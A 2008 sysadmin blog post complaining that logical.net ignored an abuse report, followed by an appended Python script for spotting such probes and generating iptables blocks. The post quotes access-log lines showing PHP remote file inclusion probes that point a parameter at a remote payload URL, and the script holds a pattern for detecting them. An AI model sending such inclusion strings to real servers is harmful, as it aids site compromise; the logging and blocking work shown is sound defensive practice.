electro acoustic expressionism
nodepet
December 8th, 2008

Logical.net – abuse reports discouraged

Filed under: Web — olliver @ 13:50 h

I merely meant to be helpful when I took the time to notify logical.net of a compromised server, possibly running an unpatched cPanel version, that was hitting one of the servers I administer with PHP remote file inclusion attempts:

209.23.116.97 - - [08/Dec/2008:11:55:28 +0100] "GET //admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 217 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:55:28 +0100] "GET /category//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 227 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:55:28 +0100] "GET /category/spam/%20%20//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 235 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:55:31 +0100] "GET /category/spam//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 232 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:56:17 +0100] "GET /failed-blogspam-automation-from-china//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 256 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:56:17 +0100] "GET /failed-blogspam-automation-from-china/%20%20//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 259 "-" "Mozilla/5.0"

209.23.116.97 has a PTR record of cpanel.acmenet.net, which looks quite telling in my opinion.

When looking up the address, I noticed that Logical Net does not differentiate between ranges for Internet service to end users and web hosting, so unless you scan PTR records you may have no way of telling them apart; there is just one block for everything:

OrgName: Logical Net Corporation
OrgID: LNC
Address: 1593 Central Ave.
City: Albany
StateProv: NY
PostalCode: 12205
Country: US

NetRange: 209.23.0.0 - 209.23.127.255
CIDR: 209.23.0.0/17
NetName: LNET-A
NetHandle: NET-209-23-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.LOGICAL.NET
NameServer: NS2.LOGICAL.NET
NameServer: NS3.LOGICAL.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1999-03-12
Updated: 2001-05-30

Nor could their routing give any more hints (sometimes it does):

route: 209.23.0.0/17
origin: AS3931
descr: LOGICAL – Logical Net Corporation
lastupd-frst: 2008-11-14 00:00Z 80.81.192.106@rrc12
lastupd-last: 2008-12-08 03:29Z 145.125.80.5@rrc00
seen-at: rrc00,rrc01,rrc04,rrc05,rrc06,rrc07,rrc10,rrc11,rrc12,rrc13,rrc14,rrc15,rrc16
num-rispeers: 96
source: RISWHOIS

According to whois they at least have an abuse address, and one is tempted to think that it was added for a reason other than looking "anti-spam". As I discovered right after sending my abuse report, this does not seem to be the case with logical.net. Here is the automated "ignore bot" reply I instantly received from them:

From: "Support" <support @ logical.net>
To: [some address]@gmail.com
Reply-To: support @ logical.net
Subject: Registration Required: Unable to create Ticket
Date: Mon, 08 Dec 2008 06:48:35 -0500
X-Mailer: Kayako eSupport v3.20.02

Your ticket has not been accepted into the system. You are required to register at the following URL to submit any issues via Email: help.logical.net/index.php?_m=core&_a=register If you already have a registered account under a different email address you may log into our ticketing system Here: http://help.logical.net/

Once registered, you will be able to submit any issues directly by sending us Email. We are sorry for any inconvenience this may have caused.

Support

Note that I did write to abuse and got a reply from support instead. However, I did not ask for their help, as I already know how to adjust my defences in order to rid myself of negligent, ignorant or even malicious network owners. I merely sent out a courtesy notice, as I figured a compromised cPanel may be some kind of disaster for those who maintain their servers/domains with it. But apparently I was mistaken. Does Logical.net really believe it is so special that I would happily jump through its hoops just to notify it of its own negligence (notice the absurdity)? I can't believe anyone in their right mind would cherish such a crazy notion, therefore I conclude third-party notifications are not desired by logical.net, which is their right (aka their network, their rules). As it is mine to refuse traffic coming from their direction.

How to block them from accessing my web servers without affecting innocent dial-up or DSL users? I spent some time looking up PTR records and noticed that the /24 the compromised machine is part of is exclusively populated by servers, mainly mail servers, but some web servers too. The same applies to the neighbouring /24, so I resolved the problem by adding the following entry to both my mail and web servers:

# logical.net do not wish to receive abuse reports
# 209.23.116.0/23 covers 209.23.116.0-209.23.117.255 (the offending /24 and its neighbour);
# --syn limits the rule to new inbound connections. -A appends: if an earlier rule already ACCEPTs new connections, use -I instead.
iptables -A INPUT -s 209.23.116.0/23 -i eth0 -p tcp -m tcp --syn -j REJECT

This way, if one of their mail servers should suddenly opt for spewing spam, I have the peace of mind of not being confronted with it. Or think of a moronic implementation of some autoresponder or challenge/response system which could be abused by spammers for hitting innocent bystanders with tons of backscatter.
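As an added example (not part of the original post, and not the author's tooling), here is a Python script that applies the two steps above: it parses Apache combined-format log lines like the ones quoted earlier, flags any request whose query parameter value is itself a remote URL or PHP stream wrapper (the remote file inclusion signature), and derives the /23 block and iptables rule from the offending address. The log lines embedded in it are constructed after the post's, with 192.0.2.x documentation addresses standing in for benign clients; the rule it prints uses -I rather than the post's -A so that it is evaluated before any earlier ACCEPT rule.

```python
"""Flag PHP remote-file-inclusion (RFI) probes in Apache access-log lines and
derive the firewall block the post ended up with.

Added example, not code from the original post.  SAMPLE_LOG is constructed
after the lines quoted in the post; the 192.0.2.x clients are made up."""
import ipaddress
import re
from urllib.parse import parse_qsl

# Constructed sample input: two probes from the post's attacker, two benign hits.
SAMPLE_LOG = """\
209.23.116.97 - - [08/Dec/2008:11:55:28 +0100] "GET //admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 217 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:55:31 +0100] "GET /category/spam//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 232 "-" "Mozilla/5.0"
192.0.2.10 - - [08/Dec/2008:12:00:00 +0100] "GET /category/spam/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [08/Dec/2008:12:01:00 +0100] "GET /index.php?o=http HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value that is a URL or a PHP stream wrapper is what an RFI probe
# feeds to include($_GET['o']) in the hope that the script fetches remote code.
REMOTE_VALUE_RE = re.compile(r'^(?:(?:https?|ftp)://|(?:php|data|expect):)', re.IGNORECASE)


def parse_line(line):
    """Return the log fields as a dict, or None for a line that does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_rfi_probes(log_text):
    """One record per query parameter whose value points at a remote resource."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        # Split on the first '?' by hand: urlsplit() would read a leading '//' as a host.
        _path, _, query = rec["target"].partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_VALUE_RE.match(value):
                hits.append({"ip": rec["ip"], "ts": rec["ts"], "param": name,
                             "url": value, "status": int(rec["status"])})
    return hits


def attacker_ips(log_text):
    """Sorted list of distinct source addresses that sent RFI probes."""
    return sorted({h["ip"] for h in find_rfi_probes(log_text)})


def covering_block(ip, prefix_len):
    """The prefix_len-sized network containing ip (the post settled on a /23)."""
    return ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)


def block_covers(block, ip):
    """True if ip falls inside block, e.g. to confirm the neighbouring /24 is included."""
    return ipaddress.ip_address(ip) in block


def iptables_rule(block, iface="eth0"):
    """Reject new TCP connections from block.  -I puts the rule at the top of
    INPUT so that an earlier ACCEPT cannot shadow it (the post used -A)."""
    return f"iptables -I INPUT -s {block} -i {iface} -p tcp -m tcp --syn -j REJECT"


if __name__ == "__main__":
    for h in find_rfi_probes(SAMPLE_LOG):
        print(f"{h['ip']} {h['ts']} {h['param']}={h['url']} -> {h['status']}")
    for ip in attacker_ips(SAMPLE_LOG):
        print(iptables_rule(covering_block(ip, 23)))
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents; the benign `o=http` line shows why the check requires a scheme followed by `://` (or a wrapper with a colon) rather than merely the substring "http". The prefix length is a deliberate choice, as in the post, and should follow what the PTR records of the neighbouring blocks actually show.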
